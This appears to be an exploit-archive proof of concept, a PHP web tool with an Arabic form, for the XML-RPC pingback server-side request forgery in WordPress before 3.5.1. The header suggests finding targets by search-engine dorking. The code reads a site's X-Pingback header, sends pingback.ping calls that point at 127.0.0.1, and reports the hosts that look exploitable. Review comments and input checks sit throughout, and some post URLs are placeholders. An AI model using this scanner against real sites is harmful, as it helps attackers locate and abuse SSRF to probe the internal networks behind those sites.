=============================================================================================================================================
| # Title : WordPress before 3.5.1 Pingback Checker Tool |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://wordpress.org/ |
=============================================================================================================================================
POC :
[+] Dorking in Google or another search engine.
[+] Code Description: The XMLRPC API in WordPress before 3.5.1 allows remote attackers to send HTTP requests to intranet servers, and conduct port-scanning attacks, by specifying a crafted source URL for a pingback, related to a Server-Side Request Forgery (SSRF) issue.
[+] save code as poc.php.
[+] Usage : http://127.0.0.1/poc.php
[+] PayLoad :
<?php
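/**
 * Checks whether a host advertises an XML-RPC endpoint through the X-Pingback
 * response header and whether that endpoint answers a pingback.ping call
 * without the int value 33 in its reply.
 *
 * All progress is written with echo as plain text. A caller that renders the
 * output inside a web page has to HTML-encode it for that context.
 *
 * Two values in this class are controlled by the remote side and are treated
 * as untrusted: the host string handed in by the caller and the X-Pingback
 * header returned by the probed server (it decides where the POST is sent).
 */
class WordpressPingbackLocator
{
    /** Path appended to the host for the header probe; always starts and ends with "/". */
    private $targetUri;

    /** Upper bound on redirects followed by the header probe. */
    private $numRedirects;

    /** True when the mysqli extension is loaded (see checkDatabase()). */
    private $dbActive;

    /** Seconds allowed for each outbound request before it is abandoned. */
    private $timeout = 10;

    /**
     * @param string $targetUri    Path of the site on the host, e.g. "/wordpress/".
     * @param int    $numRedirects Maximum number of redirects the header probe may follow.
     */
    public function __construct($targetUri = '/', $numRedirects = 10)
    {
        // Normalise to "/path/". Without the leading slash the path would be glued
        // onto the host name and the request would go to a different host.
        $path = trim((string) $targetUri, '/');
        $this->targetUri = $path === '' ? '/' : "/$path/";
        $this->numRedirects = max(0, (int) $numRedirects);
        $this->dbActive = $this->checkDatabase();
    }

    /**
     * Reports whether the mysqli extension is available.
     *
     * This only tests that the function exists; no database connection is
     * opened or verified.
     *
     * @return bool
     */
    private function checkDatabase()
    {
        return function_exists('mysqli_connect');
    }

    /**
     * Accepts a bare host name, IPv4 address or bracketed IPv6 literal with an
     * optional port. Anything containing "/", "@", "?", "#", whitespace or markup
     * is refused so the value cannot change the structure of the request URL.
     *
     * @param mixed $host
     * @return bool
     */
    private function isValidHost($host)
    {
        return is_string($host)
            && preg_match(
                '/\A(?:[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?|\[[0-9A-Fa-f:.]{2,45}\])(?::[0-9]{1,5})?\z/',
                $host
            ) === 1;
    }

    /**
     * True when the value parses as an http:// or https:// URL with a host part.
     *
     * @param mixed $url
     * @return bool
     */
    private function isHttpUrl($url)
    {
        if (!is_string($url)) {
            return false;
        }
        $parts = parse_url($url);

        return is_array($parts)
            && isset($parts['scheme'], $parts['host'])
            && in_array(strtolower($parts['scheme']), ['http', 'https'], true);
    }

    /**
     * Escapes a value for use as XML character data. The encoding argument
     * matches the iso-8859-1 declaration of the generated document.
     *
     * @param mixed $value
     * @return string
     */
    private function xmlEscape($value)
    {
        return htmlspecialchars((string) $value, ENT_XML1 | ENT_QUOTES, 'ISO-8859-1');
    }

    /**
     * Requests http://<host><targetUri> and returns the X-Pingback header value.
     *
     * @param string $ip Host name or IP address, optionally with ":port".
     * @return string|null The advertised XML-RPC URL, or null when the host is
     *                     invalid, the request fails, the header is absent, or
     *                     the header is not an http(s) URL.
     */
    public function getXmlRpcUrl($ip)
    {
        if (!$this->isValidHost($ip)) {
            // The raw value is deliberately not echoed back.
            echo "Invalid target host\n";
            return null;
        }

        echo "$ip - Enumerating XML-RPC URI...\n";
        $context = stream_context_create([
            'http' => [
                'max_redirects' => $this->numRedirects,
                'timeout' => $this->timeout,
            ],
        ]);
        $headers = get_headers("http://$ip{$this->targetUri}", true, $context);

        // get_headers() returns false on failure; header names keep the case the
        // server used, so compare them case-insensitively.
        if (is_array($headers)) {
            $headers = array_change_key_case($headers, CASE_LOWER);
            if (isset($headers['x-pingback'])) {
                $value = $headers['x-pingback'];
                // A header repeated across redirects arrives as an array; use the last one.
                if (is_array($value)) {
                    $value = end($value);
                }
                $value = trim((string) $value);
                if ($this->isHttpUrl($value)) {
                    return $value;
                }
                echo "$ip - X-Pingback header is not an http(s) URL\n";
                return null;
            }
        }

        echo "$ip - X-Pingback header not found\n";
        return null;
    }

    /**
     * Builds the XML-RPC body of a pingback.ping call.
     *
     * Both values are XML-escaped, so "&", "<" or quotes inside a URL cannot
     * break out of the <string> element or add parameters.
     *
     * @param string $target        First parameter of the call.
     * @param string $validBlogPost Second parameter of the call.
     * @return string
     */
    public function generatePingbackXml($target, $validBlogPost)
    {
        $first = $this->xmlEscape($target);
        $second = $this->xmlEscape($validBlogPost);

        return "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?>" .
            "<methodCall><methodName>pingback.ping</methodName>" .
            "<params><param><value><string>$first</string></value></param>" .
            "<param><value><string>$second</string></value></param>" .
            "</params></methodCall>";
    }

    /**
     * Sends one pingback.ping per candidate post and returns the first post
     * whose reply is an XML-RPC response that does not carry the int value 33.
     *
     * A reply that is empty or is not an XML-RPC methodResponse (an HTML error
     * page, for instance) is not counted as a positive result.
     * NOTE(review): 33 is handled here as the "not a usable pingback target"
     * fault; confirm against the fault table of the server being assessed.
     *
     * @param string $xmlRpc XML-RPC endpoint URL.
     * @param string $ip     Host label used in the progress output only.
     * @return string|null
     */
    public function getBlogPosts($xmlRpc, $ip)
    {
        foreach ($this->getAllBlogPosts() as $blogPost) {
            $response = $this->sendPingbackRequest($xmlRpc, 'http://127.0.0.1', $blogPost);
            if (!is_string($response) || $response === '') {
                continue;
            }
            if (stripos($response, '<methodResponse') === false) {
                continue;
            }
            if (strpos($response, '<value><int>33</int></value>') !== false) {
                continue;
            }
            echo "$ip - Pingback enabled: $blogPost\n";
            return $blogPost;
        }

        return null;
    }

    /**
     * POSTs a pingback.ping body to the endpoint and returns the raw reply.
     *
     * The endpoint URL originates from a response header of the probed server,
     * so the transfer is pinned to HTTP/HTTPS, redirects are not followed and
     * both connect and total time are bounded.
     *
     * @param string $xmlRpc   Endpoint URL.
     * @param string $target   First pingback.ping parameter.
     * @param string $blogPost Second pingback.ping parameter.
     * @return string|false Response body, or false when the URL is rejected or the transfer fails.
     */
    private function sendPingbackRequest($xmlRpc, $target, $blogPost)
    {
        if (!$this->isHttpUrl($xmlRpc)) {
            return false;
        }

        $pingbackXml = $this->generatePingbackXml($target, $blogPost);
        $ch = curl_init($xmlRpc);
        if ($ch === false) {
            return false;
        }

        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_POST => true,
            CURLOPT_POSTFIELDS => $pingbackXml,
            CURLOPT_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
            CURLOPT_FOLLOWLOCATION => false,
            CURLOPT_CONNECTTIMEOUT => $this->timeout,
            CURLOPT_TIMEOUT => $this->timeout,
        ]);
        $response = curl_exec($ch);
        curl_close($ch);

        return $response;
    }

    /**
     * Returns the candidate post URLs.
     *
     * These are fixed example.com placeholders; nothing is read from the
     * probed site.
     *
     * @return string[]
     */
    private function getAllBlogPosts()
    {
        return ["http://example.com/post1", "http://example.com/post2"];
    }

    /**
     * Runs the full check for one host and prints the outcome.
     *
     * @param string $ip Host name or IP address, optionally with ":port".
     * @return void
     */
    public function runHost($ip)
    {
        if (!$this->isValidHost($ip)) {
            echo "Invalid target host\n";
            return;
        }

        echo "$ip - Checking if it's a WordPress site...\n";
        $xmlrpc = $this->getXmlRpcUrl($ip);
        if (!$xmlrpc) {
            echo "$ip - Not vulnerable or not a WordPress site\n";
            return;
        }

        $blogPost = $this->getBlogPosts($xmlrpc, $ip);
        if (!$blogPost) {
            echo "$ip - X-Pingback enabled but no vulnerable blogs found\n";
            return;
        }

        // A positive result must not be reported as "no vulnerable blogs found"
        // just because the mysqli extension is missing.
        if ($this->dbActive) {
            $this->storeVuln($ip, $blogPost);
        } else {
            echo "$ip - Result not stored (mysqli extension not loaded)\n";
        }
    }

    /**
     * Reports a finding. Only prints a line; nothing is written to a database.
     *
     * @param string $ip
     * @param string $blog
     * @return void
     */
    private function storeVuln($ip, $blog)
    {
        echo "Stored vulnerability: $ip - Pingback found at $blog\n";
    }
}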
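// Form handler: runs the checker against the posted host and prints its report.
// NOTE(review): this endpoint makes the web server send outbound HTTP requests to a
// caller-chosen host and carries no authentication or CSRF token, so it should only
// be reachable from a trusted lab network.
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    $target = $_POST['target'] ?? '';
    $target = is_string($target) ? trim($target) : '';

    // Accept a bare host name, IPv4 address or bracketed IPv6 literal with an optional
    // port. The value is concatenated into a URL further down, so "/", "@", "?", "#",
    // whitespace and markup are refused here.
    $hostPattern = '/\A(?:[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?|\[[0-9A-Fa-f:.]{2,45}\])(?::[0-9]{1,5})?\z/';

    if (!empty($target)) {
        if (preg_match($hostPattern, $target) === 1) {
            $scanner = new WordpressPingbackLocator('/wordpress/');

            // The scanner echoes plain text that contains the submitted value; capture
            // it and HTML-encode it before it reaches the page.
            ob_start();
            try {
                $scanner->runHost($target);
            } finally {
                $report = (string) ob_get_clean();
            }
            echo '<pre>' . htmlspecialchars($report, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "</pre>\n";
        } else {
            // The rejected value is not reflected into the response.
            echo "<pre>Invalid target host</pre>\n";
        }
    }
}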
?>
<!DOCTYPE html>
<html lang="ar">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>فحص WordPress Pingback</title>
</head>
<body>
<h2>أداة فحص WordPress Pingback</h2>
<!-- Single-field form: with no action attribute it POSTs the "target" field back to this same script. -->
<!-- NOTE(review): the form carries no CSRF token and the page has no login step. -->
<form method="POST">
<label for="target">أدخل عنوان الموقع:</label>
<!-- "required" is a browser-side check only; the server must still validate the value. -->
<input type="text" id="target" name="target" required>
<button type="submit">فحص</button>
</form>
</body>
</html>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================